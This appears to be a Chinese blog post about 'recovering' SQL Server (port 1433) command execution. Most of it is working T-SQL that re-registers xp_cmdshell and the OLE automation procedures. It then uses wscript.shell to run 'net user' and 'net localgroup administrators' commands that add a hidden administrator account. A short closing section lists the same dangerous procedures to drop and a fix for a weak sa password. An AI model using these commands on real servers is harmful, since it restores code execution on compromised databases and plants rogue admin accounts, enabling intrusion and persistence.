`
673341766
  • 浏览: 27508 次
  • 性别: Icon_minigender_1
  • 来自: 广州
最近访客 更多访客>>
社区版块
存档分类
最新评论

1433恢复总结(mssql)

    博客分类:
  • sql
阅读更多
恢复sp_addextendedproc语句:

create procedure sp_addextendedproc --- 1996/08/30 20:13

@functname nvarchar(517),/* (owner.)name of function to call */

@dllname varchar(255)/* name of DLL containing function */

as

set implicit_transactions off

if @@trancount > 0

begin

raiserror(15002,-1,-1,'sp_addextendedproc')

return (1)

end

dbcc addextendedproc( @functname, @dllname)

return (0) -- sp_addextendedproc

GO



xp_cmdshell新的恢复办法(不用去管sp_addextendedproc是不是存在)


删除

drop procedure sp_addextendedproc

drop procedure sp_oacreate

exec sp_dropextendedproc 'xp_cmdshell'



恢复

dbcc addextendedproc ("sp_oacreate","odsole70.dll")

dbcc addextendedproc ("xp_cmdshell","xplog70.dll")



1.未能找到存储过程'master..xpcmdshell'之解决方法:



EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'





2.无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)


sp_dropextendedproc "xp_cmdshell"

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'





3.无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因:


127(找不到指定的程序。)



exec sp_dropextendedproc 'xp_cmdshell'

exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'





4.直接添加帐户法



删除odsole70.dll:



exec master..sp_dropextendedproc sp_oamethod

exec master..sp_dropextendedproc sp_oacreate



恢复odsole70.dll:



exec sp_addextendedproc sp_OAMethod,'odsole70.dll'  

exec sp_addextendedproc sp_OACreate,'odsole70.dll'



直接添加帐户命令:



declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'



declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe/c net localgroup administrators 用户名 /add'





5.恢复时一些常用的SQL语句:


利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):

use master    

exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'    

exec sp_addextendedproc xp_dirtree,'xpstar.dll'    

exec sp_addextendedproc xp_enumgroups,'xplog70.dll'    

exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'    

exec sp_addextendedproc xp_loginconfig,'xplog70.dll'    

exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'    

exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'    

exec sp_addextendedproc sp_OACreate,'odsole70.dll'    

exec sp_addextendedproc sp_OADestroy,'odsole70.dll'    

exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'    

exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'    

exec sp_addextendedproc sp_OAMethod,'odsole70.dll'    

exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'    

exec sp_addextendedproc sp_OAStop,'odsole70.dll'    

exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'    

exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'    

exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'    

exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'    

exec sp_addextendedproc xp_regread,'xpstar.dll'    

exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'    

exec sp_addextendedproc xp_regwrite,'xpstar.dll'    

exec sp_addextendedproc xp_availablemedia,'xpstar.dll' 



恢复cmdshell:exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'



判断存储扩展是否存在(返回结果为1就ok):

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'



恢复xp_cmdshell(返回结果为1就ok):

exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.

sysobjectswhere xtype='x' and name='xp_cmdshell'



否则上传xplog7.0.dll:

exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'



************************以下为防范时用**********************

1.删除所有危险扩展:

Drop PROCEDURE sp_makewebtask

exec master..sp_dropextendedproc xp_cmdshell

exec master..sp_dropextendedproc xp_dirtree

exec master..sp_dropextendedproc xp_fileexist

exec master..sp_dropextendedproc xp_terminate_process

exec master..sp_dropextendedproc sp_oamethod

exec master..sp_dropextendedproc sp_oacreate

exec master..sp_dropextendedproc xp_regaddmultistring

exec master..sp_dropextendedproc xp_regdeletekey

exec master..sp_dropextendedproc xp_regdeletevalue

exec master..sp_dropextendedproc xp_regenumkeys

exec master..sp_dropextendedproc xp_regenumvalues

exec master..sp_dropextendedproc sp_add_job

exec master..sp_dropextendedproc sp_addtask

exec master..sp_dropextendedproc xp_regread

exec master..sp_dropextendedproc xp_regwrite

exec master..sp_dropextendedproc xp_readwebtask

exec master..sp_dropextendedproc xp_makewebtask

exec master..sp_dropextendedproc xp_regremovemultistring

exec master..sp_dropextendedproc sp_OACreate

Drop PROCEDURE sp_addextendedproc



2.删除xp_cmdshell扩展:sp_dropextendedproc 'xp_cmdshell'



3.修补sa弱口令:exec sp_password NULL,'新密码','sa'

分享到:
评论

相关推荐

    MSSQL2000菜鸟进阶教程

    你需要熟悉MSSQL2000的备份模型,包括完整备份、差异备份和日志备份,以及如何进行灾难恢复和数据库恢复。 **数据库复制** MSSQL2000的复制功能允许你将数据分发到多个服务器,这对于分布式环境或数据同步非常有用...

    MSsql差异备份总结.txt

    ### 总结 通过上述分析可以看出,MS SQL Server中的差异备份是一项重要的数据保护措施,能够有效地提高数据恢复的速度和效率。正确理解和使用差异备份可以帮助组织更高效地管理其数据库资源。同时,对于文档中出现...

    Pubs Mssql示例数据库

    总结起来,Pubs MSSQL示例数据库是学习和掌握MSSQL Server功能的重要资源。通过对Pubs数据库的深入研究和实践,我们可以提升数据库管理和开发的技能,更好地应对实际工作中的挑战。无论你是初学者还是经验丰富的专业...

    MSSQL精简版.rar

    总结起来,MSSQL精简版是一个针对个人和小型企业的高效数据库解决方案,它保留了核心功能,同时简化了安装和管理过程。用户可以通过静默安装快速部署,使用企业管理器进行基本的数据库管理,同时享受SQL Server的...

    MSSQL数据库日志清理收缩工具

    总结来说,“MSSQL数据库日志清理收缩工具”是一个为了简化数据库日志维护而设计的实用工具。它能够帮助用户高效地管理日志文件,释放磁盘空间,同时减轻DBA的工作负担。然而,理解和掌握MSSQL的日志管理原理仍然是...

    C#实现MSSQL数据库附加

    总结来说,C#实现MSSQL数据库附加是一项常见且实用的任务,通过ADO.NET库与SQL Server进行通信,可以轻松地将MDF文件附加到指定的数据库。这个过程涉及到了数据库连接、SQL命令执行以及异常处理等多个关键环节,对于...

    FGMfile recover for MSSQL

    总结起来,“FGMfile recover for MSSQL”是一款针对MSSQL数据恢复的专业工具,它解决了传统数据恢复软件无法附加MDF文件的问题,为MSSQL用户提供了一条快速恢复数据的途径。正确理解和使用这类工具,能在关键时刻...

    MSSQL连接器.V2.0

    总结来说,MSSQL连接器V2.0是连接应用程序与SQL Server不可或缺的工具,它以强大的功能、易用的API和良好的兼容性,为开发者提供了便捷的数据访问通道。理解和掌握其工作原理和应用方法,将有助于提升开发效率,优化...

    mssql数据库自动备份

    #### 六、总结 通过以上介绍,我们可以了解到MSSQL数据库自动备份的具体实现方法及其重要性。正确设置自动备份策略不仅能够提高数据的安全性,还能确保业务的连续运行。企业在实施过程中应结合自身需求制定合理的...

    MSSQL数据库备份精灵

    总结来说,MSSQL数据库备份精灵是针对SQL Server管理员的一款实用工具,提供自动化备份和恢复功能,确保数据的安全和业务的连续性。其重要性在于它可以减少人为错误,提高备份效率,并在灾难发生时快速恢复数据。...

    mssql2000驱动包

    总结来说,"mssql2000驱动包"是针对SQL Server 2000数据库的一个Java连接驱动,包含msbase、mssqlserver和msutil三个组件,分别负责基础服务、数据库交互和实用工具功能,主要用于Java应用与SQL Server 2000之间的...

    拯救你的数据 通过日志恢复MSSQL数据

    总结来说,事务日志备份和恢复是一种有效保证大型数据库数据安全的策略,尤其是在数据量极大、完整备份所需时间较长的环境下。通常情况下,配合定时任务(job)来自动化执行日志备份会更加高效和安全。对于需要保证...

    MSSQL把数据库内数据生成SQL语句文本文件

    总结来说,MSSQL数据库中的数据生成为SQL语句文本文件是一个实用的功能,有助于数据备份、迁移和版本控制。通过SSMS、T-SQL命令或第三方工具,我们可以轻松完成这一任务。了解并掌握这些方法,对于任何MSSQL数据库...

    实用性部署MSSQL和Alwayson部署,Nginx Keepalived部署

    在IT领域,MSSQL(Microsoft SQL Server)是一种广泛应用的关系型数据库管理系统,而Alwayson Availability Groups (AG) 是MSSQL中用于高可用性和灾难恢复的一种特性。Alwayson使得数据库可以在多台服务器之间进行...

    MSSQL加密/恢复存储过程、视图、触发器的存储过程

    标题中的“MSSQL加密/恢复存储过程、视图、触发器的存储过程”涉及到的是SQL Server数据库管理系统中的一种安全措施,即对数据库对象(如存储过程、视图和触发器)进行加密和解密的操作。这主要是为了保护敏感数据和...

    数据库结构和数据对比工具(MSSQL)

    总结来说,"数据库结构和数据对比工具(MSSQL)"是数据库管理员和开发者的重要辅助工具,它可以帮助用户发现并解决数据库间的差异,确保数据一致性。而压缩包内的文件则构成了该工具的组成部分,共同提供了全面的对比...

    mssql2000教程

    “mssql2000精品教程”涵盖了SQL Server 2000的各个方面,从基础操作到高级应用,为学习者提供了全面的知识体系。通过深入学习,不仅能够熟练掌握数据库管理,还能在实际工作中解决各种问题,提升工作效率。这个教程...

    MSSQL2005_ORACLE10g_compare

    - **MSSQL2005**:备份和恢复流程相对直接,但在热备份和快速恢复方面,功能有限。 - **Oracle10g**:RMAN(Recovery Manager)结合Legato等工具,提供了热备份、快速恢复等高级功能,确保数据安全性。 ### 应用...

    mssql备份时“无法打开备份设备”的解决办法.

    对于DBA而言,定期检查和维护备份策略,包括测试恢复流程,是保持数据安全性和业务连续性的关键。此外,建立良好的监控机制,及时发现并处理备份过程中出现的任何异常,也是防止数据丢失的重要环节。

Global site tag (gtag.js) - Google Analytics